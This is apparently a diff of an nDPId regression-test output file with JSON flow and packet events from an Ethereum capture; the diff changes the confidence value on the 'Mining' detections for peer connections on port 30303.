00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"} 